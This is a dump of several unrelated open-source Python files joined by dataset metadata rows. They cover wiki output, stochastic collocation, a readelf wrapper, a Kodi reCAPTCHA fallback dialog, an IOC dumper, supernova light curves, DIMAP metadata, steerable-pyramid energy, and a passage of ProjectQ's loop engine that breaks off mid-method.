line = ' ' * (INDENT + MARGIN) + n.strip()
print line
##
# Prints the protocol in a "mediawiki" format.
def printWiki():
firstHeading = False
for m in protocol:
if m[0] == '':
if firstHeading:
print "|}"
__printWikiHeader(m[1], m[2])
firstHeading = True
else:
print "|-"
print "| <span style=\"white-space:nowrap;\"><tt>" + m[0] + "</tt></span> || || " + m[1]
print "|}"
def __printWikiHeader(section, desc):
print
print "=== " + section + " ==="
print
print desc
print
print "{|"
print "| '''Command''' || || '''Description'''"
|
gpl-2.0
| -5,112,870,207,491,845,000
| 53.041916
| 224
| 0.668033
| false
| 3.116367
| false
| false
| false
|
aravindalwan/unyque
|
unyque/rdimension.py
|
1
|
3726
|
'''Representation of a random variable used in stochastic collocation'''
__copyright__ = 'Copyright (C) 2011 Aravind Alwan'
__license__ = '''
This file is part of UnyQuE.
UnyQuE is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
UnyQuE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
For a copy of the GNU General Public License, please see
<http://www.gnu.org/licenses/>.
'''
class RandomDimension(object):
'''Random dimension object that encapsulates the operations along one of the
dimensions in random space, which corresponds to one of the random variables
'''
kmax = 0
nodes = None
def __init__(self, bound):
self._bound = bound
@classmethod
def set_maximum_interp_level(cls, value):
cls.kmax = value
cls._init_nodes()
@classmethod
def _init_nodes(cls):
'''Initialize nodes in a hierarchical fashion as a list of sublists,
where each sublist contains the nodes added at the corresponding level
'''
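        # For example, with kmax = 3 the hierarchy is:
        #   level 1 -> [0.5], level 2 -> [0.0, 1.0], level 3 -> [0.25, 0.75]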
cls.nodes = []
if cls.kmax > 0:
cls.nodes.append([0.5])
if cls.kmax > 1:
cls.nodes.append([0.0, 1.0])
if cls.kmax > 2:
for k in xrange(3, cls.kmax+1):
cls.nodes.append([
(1.0 + 2.0*j)/(2**(k-1)) for j in xrange(2**(k-2))])
def get_node(self, level, idx, normalized = False):
'''Return the scaled coordinates of a node at the given level and index
'''
if normalized:
return self.nodes[level-1][idx]
else:
lo = self._bound[0]
hi = self._bound[1]
return lo + (hi-lo)*self.nodes[level-1][idx]
@classmethod
def _interpolate(cls, pt1, x2):
'''Evaluate basis function centered at pt1, at x2. pt1 has to be a
tuple of the form (level, index) that specifies the interpolation level
and the index of the node at that level. x2 is any float value between
0 and 1, specifying the location where the basis function is to be
evaluated.
'''
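        # For level > 1 this is a piecewise-linear hat of half-width 1/(m-1)
        # centred on the node, where m = 2**(level1-1) + 1 nodes exist at that
        # level; level 1 is the constant function 1.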
level1, idx1 = pt1
x1 = cls.nodes[level1-1][idx1]
if level1 == 1:
return 1.0
else:
m = 2**(level1-1) + 1 # Number of nodes at this level
return (abs(x1-x2) < 1./(m-1)) * (1. - (m-1)*abs(x1-x2))
def interpolate(self, pt1, x):
'''Evaluate basis function centered at pt1, at the location x. This
method scales x to be in [0,1] and calls _interpolate to get the actual
interpolated value
'''
lo = self._bound[0]
hi = self._bound[1]
if lo <= x <= hi:
return self._interpolate(pt1, float(x-lo)/float(hi-lo))
else:
return 0.
def get_basis_function(self, pt):
'''Return bounds of the piece-wise linear basis function centered at pt.
'''
lo = self._bound[0]
hi = self._bound[1]
level, idx = pt
if level == 1:
return (lo, hi, pt)
elif level == 2:
lo = (lo + hi)/2 if idx == 1 else lo
hi = (lo + hi)/2 if idx == 0 else hi
return (lo, hi, pt)
else:
m = 2**(level-1) + 1 # Number of nodes at this level
x = lo + (hi-lo)*self.nodes[level-1][idx]
return (x-(hi-lo)/(m-1), x+(hi-lo)/(m-1), pt)
|
gpl-3.0
| -7,993,344,271,732,080,000
| 31.973451
| 80
| 0.580247
| false
| 3.763636
| false
| false
| false
|
endlessm/chromium-browser
|
native_client/pnacl/driver/pnacl-readelf.py
|
2
|
3751
|
#!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from driver_env import env
from driver_log import Log
import driver_tools
import filetype
EXTRA_ENV = {
'INPUTS': '',
'FLAGS': '',
}
PATTERNS = [
( '(-.*)', "env.append('FLAGS', $0)"),
( '(.*)', "env.append('INPUTS', pathtools.normalize($0))"),
]
def main(argv):
env.update(EXTRA_ENV)
driver_tools.ParseArgs(argv, PATTERNS)
inputs = env.get('INPUTS')
if len(inputs) == 0:
Log.Fatal("No input files given")
for infile in inputs:
driver_tools.CheckPathLength(infile)
env.push()
env.set('input', infile)
if filetype.IsLLVMBitcode(infile):
# Hack to support newlib build.
# Newlib determines whether the toolchain supports .init_array, etc., by
# compiling a small test and looking for a specific section tidbit using
# "readelf -S". Since pnacl compiles to bitcode, readelf isn't available.
# (there is a line: "if ${READELF} -S conftest | grep -e INIT_ARRAY"
# in newlib's configure file).
# TODO(sehr): we may want to implement a whole readelf on bitcode.
flags = env.get('FLAGS')
if len(flags) == 1 and flags[0] == '-S':
print('INIT_ARRAY')
return 0
Log.Fatal('Cannot handle pnacl-readelf %s' % str(argv))
return 1
driver_tools.Run('"${READELF}" ${FLAGS} ${input}')
env.pop()
# only reached in case of no errors
return 0
def get_help(unused_argv):
return """
Usage: %s <option(s)> elf-file(s)
Display information about the contents of ELF format files
Options are:
-a --all Equivalent to: -h -l -S -s -r -d -V -A -I
-h --file-header Display the ELF file header
-l --program-headers Display the program headers
--segments An alias for --program-headers
-S --section-headers Display the sections' header
--sections An alias for --section-headers
-g --section-groups Display the section groups
-t --section-details Display the section details
-e --headers Equivalent to: -h -l -S
-s --syms Display the symbol table
--symbols An alias for --syms
-n --notes Display the core notes (if present)
-r --relocs Display the relocations (if present)
-u --unwind Display the unwind info (if present)
-d --dynamic Display the dynamic section (if present)
-V --version-info Display the version sections (if present)
-A --arch-specific Display architecture specific information (if any).
-c --archive-index Display the symbol/file index in an archive
-D --use-dynamic Use the dynamic section info when displaying symbols
-x --hex-dump=<number|name>
Dump the contents of section <number|name> as bytes
-p --string-dump=<number|name>
Dump the contents of section <number|name> as strings
-R --relocated-dump=<number|name>
Dump the contents of section <number|name> as relocated bytes
-w[lLiaprmfFsoR] or
--debug-dump[=rawline,=decodedline,=info,=abbrev,=pubnames,=aranges,=macro,=frames,=str,=loc,=Ranges]
Display the contents of DWARF2 debug sections
-I --histogram Display histogram of bucket list lengths
-W --wide Allow output width to exceed 80 characters
@<file> Read options from <file>
-H --help Display this information
-v --version Display the version number of readelf
""" % env.getone('SCRIPT_NAME')
|
bsd-3-clause
| 4,530,193,218,533,686,300
| 39.333333
| 103
| 0.628099
| false
| 3.710188
| false
| false
| false
|
kreatorkodi/repository.torrentbr
|
script.module.urlresolver/lib/urlresolver/plugins/lib/recaptcha_v2.py
|
1
|
7299
|
# -*- coding: utf-8 -*-
"""
urlresolver XBMC Addon
Copyright (C) 2016 tknorris
Derived from Shani's LPro Code (https://github.com/Shani-08/ShaniXBMCWork2/blob/master/plugin.video.live.streamspro/unCaptcha.py)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
reusable captcha methods
"""
import re
import os
import xbmcgui
from urlresolver import common
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join(common.addon_path, 'resources', 'images', 'DialogBack2.png')
check_image = os.path.join(common.addon_path, 'resources', 'images', 'checked.png')
button_fo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-fo.png')
button_nofo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-nofo.png')
self.cancelled = False
self.chk = [0] * 9
self.chkbutton = [0] * 9
self.chkstate = [False] * 9
imgX, imgY, imgw, imgh = 436, 210, 408, 300
ph, pw = imgh / 3, imgw / 3
x_gap = 70
y_gap = 70
button_gap = 40
button_h = 40
button_y = imgY + imgh + button_gap
middle = imgX + (imgw / 2)
win_x = imgX - x_gap
win_y = imgY - y_gap
win_h = imgh + 2 * y_gap + button_h + button_gap
win_w = imgw + 2 * x_gap
ctrlBackgound = xbmcgui.ControlImage(win_x, win_y, win_w, win_h, bg_image)
self.addControl(ctrlBackgound)
self.msg = '[COLOR red]%s[/COLOR]' % (kwargs.get('msg'))
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY - 30, imgw, 20, self.msg, 'font13')
self.addControl(self.strActionInfo)
img = xbmcgui.ControlImage(imgX, imgY, imgw, imgh, kwargs.get('captcha'))
self.addControl(img)
self.iteration = kwargs.get('iteration')
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY + imgh, imgw, 20, common.i18n('captcha_round') % (str(self.iteration)), 'font40')
self.addControl(self.strActionInfo)
self.cancelbutton = xbmcgui.ControlButton(middle - 110, button_y, 100, button_h, common.i18n('cancel'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.okbutton = xbmcgui.ControlButton(middle + 10, button_y, 100, button_h, common.i18n('ok'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
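        # Lay a 3x3 grid of toggle buttons (with hidden check-mark overlays)
        # over the captcha image so the user can select individual tiles.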
for i in xrange(9):
row = i / 3
col = i % 3
x_pos = imgX + (pw * col)
y_pos = imgY + (ph * row)
self.chk[i] = xbmcgui.ControlImage(x_pos, y_pos, pw, ph, check_image)
self.addControl(self.chk[i])
self.chk[i].setVisible(False)
self.chkbutton[i] = xbmcgui.ControlButton(x_pos, y_pos, pw, ph, str(i + 1), font='font1', focusTexture=button_fo, noFocusTexture=button_nofo)
self.addControl(self.chkbutton[i])
for i in xrange(9):
row_start = (i / 3) * 3
right = row_start + (i + 1) % 3
left = row_start + (i - 1) % 3
up = (i - 3) % 9
down = (i + 3) % 9
self.chkbutton[i].controlRight(self.chkbutton[right])
self.chkbutton[i].controlLeft(self.chkbutton[left])
if i <= 2:
self.chkbutton[i].controlUp(self.okbutton)
else:
self.chkbutton[i].controlUp(self.chkbutton[up])
if i >= 6:
self.chkbutton[i].controlDown(self.okbutton)
else:
self.chkbutton[i].controlDown(self.chkbutton[down])
self.okbutton.controlLeft(self.cancelbutton)
self.okbutton.controlRight(self.cancelbutton)
self.cancelbutton.controlLeft(self.okbutton)
self.cancelbutton.controlRight(self.okbutton)
self.okbutton.controlDown(self.chkbutton[2])
self.okbutton.controlUp(self.chkbutton[8])
self.cancelbutton.controlDown(self.chkbutton[0])
self.cancelbutton.controlUp(self.chkbutton[6])
self.setFocus(self.okbutton)
def get(self):
self.doModal()
self.close()
if not self.cancelled:
return [i for i in xrange(9) if self.chkstate[i]]
def onControl(self, control):
if control == self.okbutton and any(self.chkstate):
self.close()
elif control == self.cancelbutton:
self.cancelled = True
self.close()
else:
label = control.getLabel()
if label.isnumeric():
index = int(label) - 1
self.chkstate[index] = not self.chkstate[index]
self.chk[index].setVisible(self.chkstate[index])
def onAction(self, action):
if action == 10:
self.cancelled = True
self.close()
class UnCaptchaReCaptcha:
net = common.Net()
def processCaptcha(self, key, lang):
headers = {'Referer': 'https://www.google.com/recaptcha/api2/demo', 'Accept-Language': lang}
html = self.net.http_GET('http://www.google.com/recaptcha/api/fallback?k=%s' % (key), headers=headers).content
token = ''
iteration = 0
while True:
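            # Keep solving image-selection rounds of the fallback captcha until
            # Google returns the verification token or the user cancels.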
payload = re.findall('"(/recaptcha/api2/payload[^"]+)', html)
iteration += 1
message = re.findall('<label[^>]+class="fbc-imageselect-message-text"[^>]*>(.*?)</label>', html)
if not message:
message = re.findall('<div[^>]+class="fbc-imageselect-message-error">(.*?)</div>', html)
if not message:
token = re.findall('"this\.select\(\)">(.*?)</textarea>', html)[0]
if token:
common.log_utils.log_debug('Captcha Success: %s' % (token))
else:
common.log_utils.log_debug('Captcha Failed: %s')
break
else:
message = message[0]
payload = payload[0]
cval = re.findall('name="c"\s+value="([^"]+)', html)[0]
captcha_imgurl = 'https://www.google.com%s' % (payload.replace('&', '&'))
message = re.sub('</?strong>', '', message)
oSolver = cInputWindow(captcha=captcha_imgurl, msg=message, iteration=iteration)
captcha_response = oSolver.get()
if not captcha_response:
break
data = {'c': cval, 'response': captcha_response}
html = self.net.http_POST("http://www.google.com/recaptcha/api/fallback?k=%s" % (key), form_data=data, headers=headers).content
return token
|
gpl-2.0
| -6,874,958,783,085,708,000
| 42.96988
| 176
| 0.590218
| false
| 3.574437
| false
| false
| false
|
mandiant/ioc_writer
|
ioc_writer/scripts/iocdump.py
|
1
|
2104
|
# iocdump.py
#
# Copyright 2016 FireEye
# Licensed under the Apache 2.0 license. Developed for Mandiant by William
# Gibb.
#
# Mandiant licenses this file to you under the Apache License, Version
# 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Dumps a textual representation of OpenIOC documents or directories of documents
#
# Stdlib
from __future__ import print_function
import argparse
import logging
import os
import sys
# Third Party code
# Custom Code
from ..managers import IOCManager
log = logging.getLogger(__name__)
def main(options):
if not options.verbose:
logging.disable(logging.DEBUG)
iocm = IOCManager()
for i in options.input:
iocm.insert(i)
for ioc_obj in iocm.iocs.values():
if options.hide_params:
ioc_obj.display_params = False
print(ioc_obj)
def makeargparser():
parser = argparse.ArgumentParser(description="Display a textual representation of an IOC or directory of IOCs")
parser.add_argument('input', type=str, nargs='+',
help='Input files or folders')
parser.add_argument('-n', '--no-params', dest='hide_params', default=False, action='store_true',
help='Do not display parameters attached to an IOC.')
parser.add_argument('-v', '--verbose', dest='verbose', default=False, action='store_true',
help='Enable verbose output')
return parser
def _main():
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s [%(filename)s:%(funcName)s]')
    p = makeargparser()
opts = p.parse_args()
main(opts)
if __name__ == '__main__':
_main()
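# Example invocation (the path below is illustrative, not from the original
# project):
#
#   python -m ioc_writer.scripts.iocdump ./iocs -n
#
# walks ./iocs, loads every IOC it finds via IOCManager, and prints a textual
# summary of each one with attached parameters suppressed.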
|
apache-2.0
| -8,542,234,613,581,370,000
| 32.951613
| 120
| 0.678232
| false
| 3.710758
| false
| false
| false
|
tayebzaidi/snova_analysis
|
Miscellaneous/typ1a_features.py
|
1
|
2252
|
import matplotlib.pyplot as plt
import scipy.interpolate as scinterp
import numpy as np
import peakfinding
import peak_original
import smoothing
import plotter
import random
import readin
import sys
import os
if __name__== '__main__':
Mbdata = []
delM15data = []
path = "/Users/zaidi/Documents/REU/restframe/"
filenames = os.listdir(path)
random.shuffle(filenames)
for filename in filenames:
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
indB = np.where((data.band == 'B'))
Bdata = data[indB]
Bdata = np.sort(Bdata)
if len(Bdata.phase) > 3:
spl = scinterp.UnivariateSpline(Bdata.phase, Bdata.mag)
spl.set_smoothing_factor(2./len(Bdata.phase))
phase_new = np.arange(Bdata.phase[0], Bdata.phase[-1], 1)
mag_new = spl(phase_new)
maxp, minp = peak_original.peakdet(mag_new, 0.5, phase_new)
if len(minp) > 0 and minp[0][0] < 5 and minp[0][0] > -5:
Mb = minp[0][1]
delM15 = minp[0][1] - spl(minp[0][0]+15)
Mbdata.append(Mb)
delM15data.append(delM15)
if delM15 > 0 or delM15 < -5:
print minp
print filename
print spl(minp[0][0] + 15)
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
ax.plot(phase_new, mag_new)
ax.plot(Bdata.phase, Bdata.mag)
if len(minp) > 0:
ax.scatter(minp[:,0],minp[:,1])
plt.show(fig)
'''
maxp, minp = peakfinding.peakdetect(mag_new, phase_new, 200, 1.5)
if len(minp) > 0:
print minp
print filename
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
#ax.scatter(minp[:,0], minp[:,1],'bo')
#ax.plot(Bdata.phase, Bdata.mag)
#plt.show(fig)
'''
#interp = smoothing.Interpolate1D(data.phase
print Mbdata
print delM15data
fig = plt.figure(2)
ax = fig.add_subplot(1,1,1)
ax.scatter(Mbdata, delM15data)
plt.show(fig)
|
gpl-3.0
| -7,822,784,365,329,970,000
| 33.121212
| 73
| 0.521314
| false
| 3.292398
| false
| false
| false
|
DREAM-ODA-OS/tools
|
metadata/dimap2eop.py
|
1
|
3474
|
#!/usr/bin/env python
#------------------------------------------------------------------------------
#
# Extract O&M-EOP metadata document.
#
# Project: EO Metadata Handling
# Authors: Martin Paces <martin.paces@eox.at>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
import traceback
import sys
import os.path
from lxml import etree as et
from profiles.interfaces import ProfileDimap
from profiles.spot6_ortho import ProfileSpot6Ortho
from profiles.spot_view import ProfileSpotView
from profiles.spot_scene_1a import ProfileSpotScene1a
from profiles.pleiades1_ortho import ProfilePleiades1Ortho
XML_OPTS = {'pretty_print': True, 'xml_declaration': True, 'encoding': 'utf-8'}
PROFILES = (
ProfileSpotScene1a, ProfileSpotView,
ProfileSpot6Ortho, ProfilePleiades1Ortho,
)
def main(fname):
xml = et.parse(fname, et.XMLParser(remove_blank_text=True))
profile = get_profile(xml)
print et.tostring(profile.extract_eop_metadata(xml, file_name=fname), **XML_OPTS)
def get_profile(xml):
for item in PROFILES:
if item.check_profile(xml):
return item
prf = ProfileDimap.get_dimap_profile(xml)
if prf is None:
raise ValueError("Not a DIMAP XML document!")
profile, version = prf
raise ValueError("Unsupported DIMAP version %s profile '%s'!"%(version, profile))
#------------------------------------------------------------------------------
if __name__ == "__main__":
EXENAME = os.path.basename(sys.argv[0])
DEBUG = False
try:
XML = sys.argv[1]
for arg in sys.argv[2:]:
if arg == "DEBUG":
DEBUG = True # dump debuging output
except IndexError:
print >>sys.stderr, "ERROR: %s: Not enough input arguments!"%EXENAME
print >>sys.stderr
print >>sys.stderr, "Extract EOP XML metadata from DIMAP XML metadata."
print >>sys.stderr
print >>sys.stderr, "USAGE: %s <input-xml> [DEBUG]"%EXENAME
sys.exit(1)
if DEBUG:
print >>sys.stderr, "input-xml: ", XML
try:
main(XML)
except Exception as exc:
print >>sys.stderr, "ERROR: %s: %s "%(EXENAME, exc)
if DEBUG:
print >>sys.stderr, traceback.format_exc()
sys.exit(1)
|
mit
| -2,620,814,347,079,095,300
| 36.354839
| 85
| 0.632988
| false
| 4.00692
| false
| false
| false
|
billbrod/spatial-frequency-preferences
|
sfp/image_computable.py
|
1
|
6815
|
#!/usr/bin/python
"""code to help run the image-computable version of the model
we're using this primarily to check the effect of vignetting, but this does make our project
image-computable (though it's a linear model and so will fail in some trivial cases)
"""
import itertools
import argparse
import numpy as np
import pandas as pd
import pyrtools as pt
from scipy import interpolate
def upsample(signal, target_shape):
"""upsample a signal to target_shape
this uses scipy's interpolate.interp2d (and so will end up with a smoothed signal)
"""
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=signal.shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=signal.shape[1])
f = interpolate.interp2d(x, y, signal)
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=target_shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=target_shape[1])
return f(x,y)
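# Usage sketch (shapes below are illustrative, not from the original project):
# upsampling a 4x4 array to 16x16 preserves the overall structure while
# smoothing between the original samples, since interp2d fits a spline.
#
#   sig = np.arange(16, dtype=float).reshape(4, 4)
#   up = upsample(sig, (16, 16))
#   assert up.shape == (16, 16)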
def calc_energy_and_filters(stim, stim_df, n_orientations=6, save_path_template=None):
"""this creates the energy and filter arrays
We assume the stimuli have natural groups, here indexed by the "class_idx" column in stim_df,
and all stimuli within these groups should be considered the same stimuli, that is, we sum the
energy across all of them. for the spatial frequency project, these are the different phases of
the gratings (because of how we structure our experiment, we estimate a response amplitude to
all phases together).
Note that this will take a while to run (~10 or 20 minutes). Since it only needs to run once
per experiment, didn't bother to make it efficient at all. The outputs will also be very large,
totalling about 11GB
Parameters
----------
stim : np.ndarray
The stimuli to produce energy for. Should have shape (n, *img_size), where n is the number
of total stimuli.
stim_df : pd.DataFrame
The DataFrame describing the stimuli. Must contain the column "class_idx", which indexes
the different stimulus classes (see above)
n_orientations : int
the number of orientations in the steerable pyramid. 6 is the number used to model fMRI
voxels in Roth, Z. N., Heeger, D., & Merriam, E. (2018). Stimulus vignetting and
orientation selectivity in human visual cortex. bioRxiv.
save_path_template : str or None
the template string for the save path we'll use for energy and filters. should end in .npy
and contain one %s, which we'll replace with "energy" and "filters".
Returns
-------
energy : np.ndarray
energy has shape (stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size) and
contains the energy (square and absolute value the complex valued output of
SteerablePyramidFreq; equivalently, square and sum the output of the quadrature pair of
filters that make up the pyramid) for each image, at each scale and orientation. the energy
has all been upsampled to the size of the initial image.
filters : np.ndarray
filters has shape (max_ht, n_orientations, *img_size) and is the fourier transform of the
filters at each scale and orientation, zero-padded so they all have the same size. we only
have one set of filters (instead of one per stimulus class) because the same pyramid was
used for each of them; we ensure this by getting the filters for each stimulus class and
checking that they're individually equal to the average across classes.
"""
img_size = stim.shape[1:]
# this computation comes from the SteerablePyramidFreq code
max_ht = int(np.floor(np.log2(min(img_size))) - 2)
energy = np.zeros((stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size),
dtype=np.float32)
filters = np.zeros_like(energy)
for i, g in stim_df.groupby('class_idx'):
idx = g.index
filled_filters = False
for j in idx:
pyr = pt.pyramids.SteerablePyramidFreq(stim[j], order=n_orientations-1, is_complex=True)
for k, l in itertools.product(range(max_ht), range(n_orientations)):
energy[int(i), k, l, :, :] += upsample(np.abs(pyr.pyr_coeffs[(k, l)])**2, img_size)
# we only want to run this once per stimulus class
if not filled_filters:
if k > 0:
lomask = pyr._lomasks[k-1]
else:
lomask = pyr._lo0mask
filt = pyr._anglemasks[k][l] * pyr._himasks[k] * lomask
pad_num = []
for m in range(2):
pad_num.append([(img_size[m] - filt.shape[m])//2, (img_size[m] - filt.shape[m])//2])
if filt.shape[m] + 2*pad_num[m][0] != img_size[m]:
pad_num[m][0] += img_size[m] - (filt.shape[m] + 2*pad_num[m][0])
filters[int(i), k, l, :, :] = np.pad(filt, pad_num, 'constant', constant_values=0)
filled_filters = True
filter_mean = np.mean(filters, 0)
for i in range(filters.shape[0]):
if not(np.allclose(filter_mean, filters[i,:,:,:,:])):
raise Exception("Something has gone terribly wrong, the filters for stim class %d are different than the rest!" % i)
filters = filter_mean
if save_path_template is not None:
np.save(save_path_template % "energy", energy)
np.save(save_path_template % "filters", filters)
return energy, filters
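# Usage sketch (tiny random inputs, purely illustrative -- real stimuli are far
# larger and this call is slow, see the docstring above). With 64x64 images
# max_ht works out to 4, so the outputs have shapes (2, 4, 6, 64, 64) and
# (4, 6, 64, 64) respectively:
#
#   stim = np.random.rand(4, 64, 64).astype(np.float32)
#   stim_df = pd.DataFrame({'class_idx': [0, 0, 1, 1]})
#   energy, filters = calc_energy_and_filters(stim, stim_df, n_orientations=6)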
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=("Calculate and save the energy for each stimulus class, as well as the Fourier"
" transform of the filters of the steerable pyramid we use to get this. For "
"use with image-computable version of this model"),
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("stimuli",
help=("Path to the stimulus .npy file."))
parser.add_argument("stimuli_description_df",
help=("Path to the stimulus description dataframe .csv file."))
parser.add_argument("save_path_template",
                        help=("Path template (with .npy extension) where we'll save the results. "
                              "Should contain one %%s."))
parser.add_argument('--n_orientations', '-n', default=6, type=int,
help=("The number of orientations in the steerable pyramid used here."))
args = vars(parser.parse_args())
stim = np.load(args.pop('stimuli'))
stim_df = pd.read_csv(args.pop('stimuli_description_df'))
calc_energy_and_filters(stim, stim_df, **args)
|
mit
| 7,969,133,745,800,178,000
| 51.423077
| 128
| 0.634776
| false
| 3.784009
| false
| false
| false
|
ProjectQ-Framework/ProjectQ
|
projectq/meta/_loop.py
|
1
|
9774
|
# -*- coding: utf-8 -*-
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tools to implement loops.
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
"""
from copy import deepcopy
from projectq.cengines import BasicEngine
from projectq.ops import Allocate, Deallocate
from ._util import insert_engine, drop_engine_after
class QubitManagementError(Exception):
"""Exception raised when the lifetime of a qubit is problematic within a loop"""
class LoopTag:
"""
Loop meta tag
"""
def __init__(self, num):
self.num = num
self.id = LoopTag.loop_tag_id
LoopTag.loop_tag_id += 1
def __eq__(self, other):
return isinstance(other, LoopTag) and self.id == other.id and self.num == other.num
def __ne__(self, other):
return not self.__eq__(other)
loop_tag_id = 0
class LoopEngine(BasicEngine):
"""
Stores all commands and, when done, executes them num times if no loop tag
handler engine is available.
If there is one, it adds a loop_tag to the commands and sends them on.
"""
def __init__(self, num):
"""
Initialize a LoopEngine.
Args:
num (int): Number of loop iterations.
"""
BasicEngine.__init__(self)
self._tag = LoopTag(num)
self._cmd_list = []
self._allocated_qubit_ids = set()
self._deallocated_qubit_ids = set()
# key: qubit id of a local qubit, i.e. a qubit which has been allocated
# and deallocated within the loop body.
# value: list contain reference to each weakref qubit with this qubit
# id either within control_qubits or qubits.
self._refs_to_local_qb = dict()
self._next_engines_support_loop_tag = False
def run(self):
"""
Apply the loop statements to all stored commands.
Unrolls the loop if LoopTag is not supported by any of the following
engines, i.e., if
.. code-block:: python
is_meta_tag_supported(next_engine, LoopTag) == False
"""
        error_message = (
            "\n Error. Qubits have been allocated in with "
            "Loop(eng, num) context,\n which have not "
            "explicitly been deallocated in the Loop context.\n"
"Correct usage:\nwith Loop(eng, 5):\n"
" qubit = eng.allocate_qubit()\n"
" ...\n"
" del qubit[0]\n"
)
if not self._next_engines_support_loop_tag: # pylint: disable=too-many-nested-blocks
# Unroll the loop
# Check that local qubits have been deallocated:
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
if len(self._allocated_qubit_ids) == 0:
# No local qubits, just send the circuit num times
for i in range(self._tag.num):
self.send(deepcopy(self._cmd_list))
else:
# Ancilla qubits have been allocated in loop body
# For each iteration, allocate and deallocate a new qubit and
# replace the qubit id in all commands using it.
for i in range(self._tag.num):
if i == 0: # Don't change local qubit ids
self.send(deepcopy(self._cmd_list))
else:
# Change local qubit ids before sending them
for refs_loc_qubit in self._refs_to_local_qb.values():
new_qb_id = self.main_engine.get_new_qubit_id()
for qubit_ref in refs_loc_qubit:
qubit_ref.id = new_qb_id
self.send(deepcopy(self._cmd_list))
else:
# Next engines support loop tag so no unrolling needed only
# check that all qubits have been deallocated which have been
# allocated in the loop body
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
def receive(self, command_list): # pylint: disable=too-many-branches
"""
Receive (and potentially temporarily store) all commands.
Add LoopTag to all receiving commands and send to the next engine if
a further engine is a LoopTag-handling engine. Otherwise store all
commands (to later unroll them). Check that within the loop body,
all allocated qubits have also been deallocated. If loop needs to be
unrolled and ancilla qubits have been allocated within the loop body,
        then store a reference to all these qubit ids (to change them when
unrolling the loop)
Args:
command_list (list<Command>): List of commands to store and later
unroll or, if there is a LoopTag-handling engine, add the
LoopTag.
"""
# pylint: disable=too-many-nested-blocks
if self._next_engines_support_loop_tag or self.next_engine.is_meta_tag_supported(LoopTag):
# Loop tag is supported, send everything with a LoopTag
# Don't check is_meta_tag_supported anymore
self._next_engines_support_loop_tag = True
if self._tag.num == 0:
return
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
elif cmd.gate == Deallocate:
